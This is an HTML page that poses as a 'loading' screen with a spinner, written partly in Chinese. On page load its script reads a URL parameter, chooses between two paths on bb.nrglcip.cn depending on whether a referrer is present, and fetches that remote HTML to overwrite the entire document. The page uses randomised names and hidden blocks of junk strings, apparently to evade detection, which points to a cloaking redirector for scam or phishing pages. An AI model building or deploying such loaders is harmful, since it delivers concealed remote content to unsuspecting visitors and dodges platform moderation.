<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SztvO9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SztvO9 .j5fHVfh8yy6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SztvO9 .content {
            line-height: 50px;
            text-align: center
        }

        .SztvO9 .img {
            width: 100%
        }

        .SztvO9 .zKwkW93Y4Fd {
            text-align: center
        }

        .SztvO9 .zKwkW93Y4Fd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SztvO9 .zKwkW93Y4Fd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SztvO9 .zKwkW93Y4Fd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SztvO9 .zKwkW93Y4Fd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SztvO9 .zKwkW93Y4Fd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SztvO9 .zKwkW93Y4Fd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SztvO9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ruZtu5UIiJK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var o4cmOlX = ruZtu5UIiJK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ o4cmOlX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ o4cmOlX +".html?a=share";
		}
		
        eohOyEM=url+"#"+new Date().getTime();
        eohOyEM && function() {
            $.get(eohOyEM, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>RIa1IHayhdljlL0Kl3hw59yCksLGSNms7xfogr7qgNgYF</span>
<a  href='#' style='display:none'>GlCIonBbhLvuOJWpOcam1lON7iGzDL6NOCzUwFLRvrkfI2GnN5m5CU</a>
<a  href='#' style='display:none'>GlCIonBbhLvuOJWpOcam1lON7iGzDL6NOCzUwFLRvrkfI2GnN5m5CU</a>
<a  href='#' style='display:none'>GlCIonBbhLvuOJWpOcam1lON7iGzDL6NOCzUwFLRvrkfI2GnN5m5CU</a>
<p  style='display:none'>hJOQ3CAiv9AxawhvPl75BJrEioBibkEhh6jL3xmS21Z0NI7YVZ0TjcEWdDUWx4za2Melw2LKxAWt5BZVF0pRAdClvjQRn6t6y</p>
<ul style='display:none' >ijV6ZqarfmKdNrMTHDRcMIRNu5LgwDkvpJ9yDidDtBktwJ59F6tefAloTW4Nys4VAIYCCkwhSkwUt6SlGzqR92</ul>
<li style='display:none' >hq9rnfpPAXldWwcpWASCe6wCQ9reYHSgwSZkzSY2v6r30leZeaarpqiG6Pxfw4vk57zs0D4</li>
<div style='display:none'>VJCeNfo0Y3vdMP4YbY2Cd8m1U9Yr5C3Us9Y1CCKckS1XK4iJpXHJ7sy3ZMc7</div>
<ul style='display:none' >ijV6ZqarfmKdNrMTHDRcMIRNu5LgwDkvpJ9yDidDtBktwJ59F6tefAloTW4Nys4VAIYCCkwhSkwUt6SlGzqR92</ul>
<a  href='#' style='display:none'>GlCIonBbhLvuOJWpOcam1lON7iGzDL6NOCzUwFLRvrkfI2GnN5m5CU</a><div class="SztvO9">
    <div class="j5fHVfh8yy6">
        <div class="zKwkW93Y4Fd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >uQ92VJk15mnYPq7aZE9hfdNAt7fgrmQjLdwnXhhg71PPJU0Wj3AZYHh2ol1ULqIzzSjFvBaqF9NLRHp7k0TawZ14KqG</ul>
<li style='display:none' >KIYG4JRMvrbiMcBL5gu4MC5QDKUS1R3eTcYkq0WypkiuRYQeEbXQkdSZNnu</li>
<h1 style='display:none' >YYSeeNVlKUHXHqRw8miPufSTzFR7ng0GVgfsNB6UTnHauqcpM1KDQ</h1>
<h1 style='display:none' >YYSeeNVlKUHXHqRw8miPufSTzFR7ng0GVgfsNB6UTnHauqcpM1KDQ</h1></body>
</html>